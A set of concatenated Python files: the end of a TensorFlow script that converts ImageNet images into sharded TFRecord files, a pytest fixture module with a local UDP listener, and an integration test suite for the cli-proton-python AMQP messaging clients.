synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
conftest.py
|
"""Fixtures for testing."""
import socketserver
import threading
import time
import pytest
import charcoal
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""Mixin for handling connections asynchronsly."""
class Listener(socketserver.BaseRequestHandler):
"""Simple UDP listener for testing."""
received = []
def handle(self):
"""Handle incoming UDP messages."""
data = self.request[0].strip()
self.received.extend(data.split(b'\n'))
@classmethod
def load_received(cls, wait=0.01):
"""Yield from the received stats.
But only after a slight delay, otherwise they might not all be there.
"""
time.sleep(wait)
yield from cls.received
cls.received.clear()
@pytest.yield_fixture(scope='session')
def listener():
"""Setup the listener for tests."""
server_address = ('localhost', 8125)
server = ThreadedUDPServer(server_address, Listener)
# ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
yield Listener
server.shutdown()
server.server_close()
@pytest.fixture(scope='function')
def client():
"""Client for tests."""
return charcoal.StatsClient('mystats')
|
test_integration.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2017 Red Hat Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" cli-proton-python integration test suite """
from __future__ import print_function, absolute_import
import threading
import subprocess
import ast
import unittest
import random
import time
import sys
import os
import proton
from cli_proton_python import sender, receiver, connector
# Client executor classes
class SenderReceiverTestCase(unittest.TestCase):
""" Sender / Recevier wrapper test class """
recv_messages = None
def setUp(self):
""" set up """
pass
def tearDown(self):
""" tear down """
self.run_receiver()
@staticmethod
def get_sender(opts):
""" instantiates and return sender instance """
return sender.Send(opts)
@staticmethod
def get_receiver(opts):
""" instantiates and return receiver instance """
return receiver.Recv(opts)
@staticmethod
def get_sender_opts():
""" returns the default sender options """
parser = sender.options.SenderOptions()
opts, _ = parser.parse_args()
opts.log_msgs = 'store'
return opts
@staticmethod
def get_receiver_opts():
""" returns the default receiver options """
parser = sender.options.ReceiverOptions()
opts, _ = parser.parse_args()
opts.log_msgs = 'store'
return opts
def run_sender(self, in_opts=None):
""" executes the sender with given or default options """
opts = in_opts or self.get_sender_opts()
send = self.get_sender(opts)
container = proton.reactor.Container(send)
container.run()
return send.get_messages()
def run_receiver(self, in_opts=None):
""" executes the receiver with given or default options """
opts = in_opts or self.get_receiver_opts()
recv = self.get_receiver(opts)
container = proton.reactor.Container(recv)
container.run()
return recv.get_messages()
class TxSenderReceiverTestCase(SenderReceiverTestCase):
""" transactional Sender / Recevier wrapper test class """
@staticmethod
def get_sender(opts):
return sender.TxSend(opts)
@staticmethod
def get_receiver(opts):
return receiver.TxRecv(opts)
def get_sender_opts(self):
""" returns the default sender options """
opts = super(TxSenderReceiverTestCase, self).get_sender_opts()
opts.tx_size = 1
return opts
def get_receiver_opts(self):
""" returns the default receiver options """
opts = super(TxSenderReceiverTestCase, self).get_receiver_opts()
opts.tx_size = 1
return opts
class P2PTestCase(SenderReceiverTestCase):
""" listener wrapper test class """
def tearDown(self):
pass
def get_sender_opts(self):
""" returns the default receiver options """
opts = super(P2PTestCase, self).get_sender_opts()
opts.broker_url = 'localhost:8888'
return opts
def get_receiver_opts(self):
""" returns the default receiver options """
opts = super(P2PTestCase, self).get_receiver_opts()
opts.broker_url = 'localhost:8888'
opts.recv_listen = True
return opts
def run_receiver(self, in_opts=None):
""" executes the receiver with given or default options """
self.recv_messages = super(P2PTestCase, self).run_receiver(in_opts)
class ConnectorTestCase(unittest.TestCase):
""" Connector wrapper test class """
@staticmethod
def get_connector_opts():
""" returns the default connector options """
parser = sender.options.ConnectorOptions()
opts, _ = parser.parse_args()
opts.log_msgs = 'store'
opts.obj_ctrl = 'CESR'
return opts
def run_connector(self, in_opts=None):
""" executes the connector with given or default options """
opts = in_opts or self.get_connector_opts()
conn = connector.Connector(opts)
container = proton.reactor.Container(conn)
container.run()
return conn.get_messages()
class CommandLineTestCase(unittest.TestCase):
""" command line clients wrapper test class """
@staticmethod
def run_client(cli_path, opts, wait=True):
"""
executes the connector with given or default options
return client stdout or client instance when running on background
"""
cli = subprocess.Popen([cli_path] + (opts or []), stderr=subprocess.STDOUT,
stdout=subprocess.PIPE, universal_newlines=True)
if not wait:
return cli
cli.wait()
stdout = [l.strip() for l in cli.stdout]
cli.stdout.close()
return stdout
def run_sender(self, in_opts=None):
""" executes the connector with given or default options """
return self.run_client('../cli_proton_python/sender.py', in_opts)
def run_receiver(self, in_opts=None, in_wait=True):
""" executes the connector with given or default options """
return self.run_client('../cli_proton_python/receiver.py', in_opts, in_wait)
def run_connector(self, in_opts=None):
""" executes the connector with given or default options """
return self.run_client('../cli_proton_python/connector.py', in_opts)
# Tests
class MessageDeliveryTests(SenderReceiverTestCase):
""" message delivery test group """
def test_send_receive(self):
""" tests basic send and receive of a message """
sent_messages = self.run_sender()
recv_messages = self.run_receiver()
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_send_receive_hundred(self):
""" tests basic send and receive of a message """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.count = 100
recv_opts.count = 100
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(sent_messages), send_opts.count)
self.assertEqual(len(recv_messages), send_opts.count)
class MessageTypeTests(SenderReceiverTestCase):
""" message type test group """
def test_msg_type(self):
""" tests type of sent and received message """
sent_messages = self.run_sender()
recv_messages = self.run_receiver()
self.assertIsInstance(sent_messages[0], proton.Message)
self.assertIsInstance(recv_messages[0], proton.Message)
class MessageOptionsTests(SenderReceiverTestCase):
""" message fields test group """
def test_msg_correlation_id(self):
""" tests message corelation field """
send_opts = self.get_sender_opts()
send_opts.msg_correlation_id = 'correlation id'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].correlation_id, send_opts.msg_correlation_id)
self.assertEqual(sent_messages[0].correlation_id, recv_messages[0].correlation_id)
def test_msg_durable(self):
""" tests message durable field """
send_opts = self.get_sender_opts()
send_opts.msg_durable = 'True'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].durable, True)
self.assertEqual(sent_messages[0].durable, recv_messages[0].durable)
def test_msg_id(self):
""" tests message id field """
send_opts = self.get_sender_opts()
send_opts.msg_id = 'testId'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].id, send_opts.msg_id)
self.assertEqual(sent_messages[0].id, recv_messages[0].id)
def test_msg_user_id(self):
""" tests message user id field """
send_opts = self.get_sender_opts()
send_opts.msg_user_id = 'anonymous'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].user_id.decode(), send_opts.msg_user_id)
self.assertEqual(sent_messages[0].user_id.decode(), recv_messages[0].user_id.decode())
def test_msg_group_id(self):
""" tests message group id field """
send_opts = self.get_sender_opts()
send_opts.msg_group_id = 'anonymous'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].group_id, send_opts.msg_group_id)
self.assertEqual(sent_messages[0].group_id, recv_messages[0].group_id)
def test_test_msg_group_seq(self):
""" tests message group seq fields"""
send_opts = self.get_sender_opts()
send_opts.msg_group_seq = 1
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].group_sequence, send_opts.msg_group_seq)
self.assertEqual(sent_messages[0].group_sequence, recv_messages[0].group_sequence)
def test_msg_priority(self):
""" tests message priority field """
send_opts = self.get_sender_opts()
send_opts.msg_priority = 1
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].priority, send_opts.msg_priority)
self.assertEqual(sent_messages[0].priority, recv_messages[0].priority)
def test_msg_ttl(self):
""" tests message time to live field """
send_opts = self.get_sender_opts()
send_opts = self.get_sender_opts()
send_opts.msg_ttl = 500
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].ttl, send_opts.msg_ttl/1000.0)
self.assertLessEqual(recv_messages[0].ttl, send_opts.msg_ttl/1000.0)
def test_msg_address(self):
""" tests message address field """
send_opts = self.get_sender_opts()
send_opts.msg_address = 'examples'
send_opts.broker_url = '127.0.0.1:5672'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].address, send_opts.msg_address)
self.assertEqual(sent_messages[0].address, recv_messages[0].address)
def test_msg_reply_to(self):
""" tests message reply to address field """
send_opts = self.get_sender_opts()
send_opts.msg_reply_to = 'examples'
recv_opts = self.get_receiver_opts()
recv_opts.process_reply_to = True
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(sent_messages[0].reply_to, send_opts.msg_reply_to)
self.assertEqual(sent_messages[0].reply_to, recv_messages[0].reply_to)
def test_msg_properties(self):
""" tests message properties """
send_opts = self.get_sender_opts()
send_opts.msg_properties = {'test=property'}
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].properties, {'test':'property'})
self.assertEqual(sent_messages[0].properties, recv_messages[0].properties)
class MessageContentTests(SenderReceiverTestCase):
""" message content test group """
def test_msg_content_string(self):
""" tests text message """
send_opts = self.get_sender_opts()
send_opts.msg_content = 'text message'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].body, send_opts.msg_content)
self.assertEqual(sent_messages[0].body, recv_messages[0].body)
self.assertEqual(sent_messages[0].content_type, 'text/plain')
self.assertEqual(sent_messages[0].content_type, recv_messages[0].content_type)
def test_msg_content_string_chars(self):
""" tests text message """
send_opts = self.get_sender_opts()
send_opts.msg_content = r'+ěščřžýáíéé=)ů§.-!@#$%^&*()_[]\;/.,\'`~'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].body, send_opts.msg_content)
self.assertEqual(sent_messages[0].body, recv_messages[0].body)
self.assertEqual(sent_messages[0].content_type, 'text/plain')
self.assertEqual(sent_messages[0].content_type, recv_messages[0].content_type)
def test_msg_content_list(self):
""" tests list message """
send_opts = self.get_sender_opts()
send_opts.msg_list_items = ['list message']
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertIsInstance(sent_messages[0].body, list)
self.assertIsInstance(recv_messages[0].body, list)
self.assertEqual(sent_messages[0].content_type, 'amqp/list')
self.assertEqual(recv_messages[0].content_type, 'amqp/list')
def test_msg_content_map(self):
""" tests map message """
send_opts = self.get_sender_opts()
send_opts.msg_map_items = ['map=message']
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertIsInstance(sent_messages[0].body, dict)
self.assertIsInstance(recv_messages[0].body, dict)
self.assertEqual(sent_messages[0].content_type, 'amqp/map')
self.assertEqual(recv_messages[0].content_type, 'amqp/map')
def test_msg_content_numbering(self):
""" tests message numbering """
send_opts = self.get_sender_opts()
send_opts.msg_content = 'message %d'
send_opts.count = random.randint(2, 10)
self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), send_opts.count)
self.assertEqual(recv_messages[0].body, 'message 0')
self.assertEqual(recv_messages[(send_opts.count)-1].body, "message %s" %(send_opts.count-1))
@unittest.skip("test not implemented yet")
class MessageValuesRetypeTests(SenderReceiverTestCase):
""" retype message fields test group """
pass
@unittest.skip("test not implemented yet")
class AuthenticationTests(SenderReceiverTestCase):
""" clients authentication test group """
def test_client_authentication(self):
""" tests client authentication """
pass
@unittest.skip("test class not implemented yet")
class ReactorOptionsTests(SenderReceiverTestCase):
""" reactor options test group """
pass
class ConnectionOptionsTests(SenderReceiverTestCase):
""" connection options test group """
def setUp(self):
""" create connect.json """
f = open("connect.json", "w")
f.write('{"scheme": "amqp"}')
f.close()
def test_auth_mechs_anonymous(self):
""" tests allowed authentication mechanisms: anonymous """
send_opts = self.get_sender_opts()
send_opts.conn_allowed_mechs = 'ANONYMOUS'
recv_opts = self.get_receiver_opts()
recv_opts.conn_allowed_mechs = 'ANONYMOUS'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_read_config_file_send_receive_opts(self):
""" tests connection from configuration file """
send_opts = self.get_sender_opts()
send_opts.conn_use_config_file = True
recv_opts = self.get_receiver_opts()
recv_opts.conn_use_config_file = True
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def tearDown(self):
""" delete connect.json """
os.remove("connect.json")
@unittest.skip("test class not implemented yet")
class LinkOptionsTests(SenderReceiverTestCase):
""" link options test group """
pass
class LoggingOptionsTests(CommandLineTestCase):
""" logging options test group """
def test_messages_logging_dict(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'dict'])
recv_messages = self.run_receiver(['--log-msgs', 'dict'])
self.assertTrue(isinstance(ast.literal_eval(sent_messages[0]), dict))
self.assertTrue(isinstance(ast.literal_eval(recv_messages[0]), dict))
def test_messages_logging_body(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'body'])
recv_messages = self.run_receiver(['--log-msgs', 'body'])
self.assertEqual(sent_messages[0], 'None')
self.assertEqual(recv_messages[0], 'None')
def test_messages_logging_upstream(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'upstream'])
recv_messages = self.run_receiver(['--log-msgs', 'upstream'])
self.assertTrue(sent_messages[0].startswith('Message'))
self.assertTrue(recv_messages[0].startswith('Message'))
def test_messages_logging_none(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'none'])
recv_messages = self.run_receiver(['--log-msgs', 'none'])
self.assertTrue(len(sent_messages) == len(recv_messages) == 0)
def test_messages_logging_interop(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'interop'])
recv_messages = self.run_receiver(['--log-msgs', 'interop'])
self.assertTrue(isinstance(ast.literal_eval(sent_messages[0]), dict))
self.assertTrue(isinstance(ast.literal_eval(recv_messages[0]), dict))
@unittest.skip("test not implemented yet")
def test_statistics_logging(self):
""" tests statistics logging option """
pass
@unittest.skip("test not implemented yet")
def test_library_logging(self):
""" tests proton logging option """
class ControlOptionsTests(SenderReceiverTestCase):
""" control options test group """
def test_broker_url(self):
""" tests broker url option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.broker_url = '127.0.0.1:5672/examples'
recv_opts.broker_url = '127.0.0.1:5672/examples'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_messages_count(self):
""" tests meesage count option """
send_opts = self.get_sender_opts()
send_opts.count = random.randint(1, 10)
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertTrue(len(sent_messages) == len(recv_messages) == send_opts.count)
def test_duration_sender(self):
""" tests sender's duration option """
send_opts = self.get_sender_opts()
send_opts.duration = 1
send_opts.count = 2
tstamp = time.time()
self.run_sender(send_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
self.run_receiver()
def test_timeout_receiver(self):
""" tests recever's time-out option """
recv_opts = self.get_receiver_opts()
recv_opts.timeout = 1
tstamp = time.time()
self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
def test_timeout_sender(self):
""" tests sender's time-out option """
send_opts = self.get_sender_opts()
send_opts.broker_url = '127.0.0.1:5673/examples'
send_opts.timeout = 1
tstamp = time.time()
self.run_sender(send_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
@unittest.skip("known issue #17")
def test_duration_timeout_receiver(self):
""" tests combining receiver's duration and timeout option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.count = 2
recv_opts.count = 2
recv_opts.duration = 3
recv_opts.timeout = 1
self.run_sender(send_opts)
tstamp = time.time()
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
self.assertEqual(len(recv_messages), 1)
def test_duration_receiver(self):
""" tests receiver's duration option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.count = 2
recv_opts.count = 2
recv_opts.duration = 1
self.run_sender(send_opts)
tstamp = time.time()
self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
@unittest.skip("test not implemented yet")
def test_duration_mode(self):
""" tests duration mode option """
pass
@unittest.skip("test not implemented yet")
def test_capacity(self):
""" tests capacity option """
pass
@unittest.skip("test not implemented yet")
def test_dynamic(self):
""" tests dynamic flag option """
pass
def test_close_sleep(self):
""" tests close sleep option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.close_sleep = 1
recv_opts.close_sleep = 1
tstamp = time.time()
self.run_sender(send_opts)
self.assertTrue(1.1 > time.time() - tstamp > 1)
tstamp = time.time()
self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 1)
@unittest.skip("test not implemented yet")
def test_sync_mode(self):
""" tests synchronization mode option """
pass
class ReceiverOptionsTests(SenderReceiverTestCase):
""" receiver options test group """
def test_message_reply_to(self):
""" tests message reply to address option """
send_opts = self.get_sender_opts()
send_opts.msg_reply_to = 'examples'
recv_opts = self.get_receiver_opts()
recv_opts.process_reply_to = True
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
reply_to_messages = self.run_receiver()
self.assertEqual(sent_messages[0].reply_to, send_opts.msg_reply_to)
self.assertEqual(sent_messages[0].reply_to, recv_messages[0].reply_to)
self.assertEqual(len(reply_to_messages), 1)
@unittest.skip("test not implemented yet")
def test_message_action(self):
""" tests message action option """
pass
@unittest.skip("test not implemented yet")
def test_message_batch_action(self):
""" tests message batch action option """
pass
def test_message_selector(self):
""" tests message selector option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.msg_properties = {u'test=selector-non-match'}
self.run_sender(send_opts)
send_opts.msg_properties = {u'test=selector-match'}
self.run_sender(send_opts)
recv_opts.recv_selector = "test = 'selector-match'"
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(recv_messages), 1)
self.assertEqual(recv_messages[0].properties, {'test': 'selector-match'})
def test_browse(self):
""" tests browse option """
self.run_sender()
recv_opts = self.get_receiver_opts()
recv_opts.recv_browse = True
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(recv_messages), 1)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), 1)
def test_consume(self):
""" tests consume message option (default) """
self.run_sender()
recv_opts = self.get_receiver_opts()
recv_opts.recv_consume = True
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(recv_messages), 1)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), 0)
@unittest.skip("test not implemented yet")
def test_message_filter(self):
""" tests message filter option """
pass
@unittest.skip("test not implemented yet")
def test_listener(self):
""" point-to-point tests covered in P2PTests
.. :seealso:: P2PTests
"""
pass
# Transactional tests
class TxControlOptionsTests(ControlOptionsTests, TxSenderReceiverTestCase):
""" transactional options test group """
@unittest.skip("known issue#18")
def test_timeout_receiver(self):
pass
class TxMessageDeliveryTests(MessageDeliveryTests, TxSenderReceiverTestCase):
""" transactional test group """
class TxMessageTypeTests(MessageTypeTests, TxSenderReceiverTestCase):
''' transactional message type test group '''
class TxMessageOptionsTests(MessageOptionsTests, TxSenderReceiverTestCase):
''' transactional message fields test group '''
@unittest.skip("known issue#19")
def test_msg_reply_to(self):
""" skipped in transactional mode """
@unittest.skip("currently disabled due to ARTEMIS-1535")
def test_msg_durable(self):
""" skipped in transactional mode """
class TxMessageContentTests(MessageContentTests, TxSenderReceiverTestCase):
''' transactional message content test group '''
class TxReceiverOptionsTests(ReceiverOptionsTests, TxSenderReceiverTestCase):
""" transactional receiver options test group """
@unittest.skip("known issue#19")
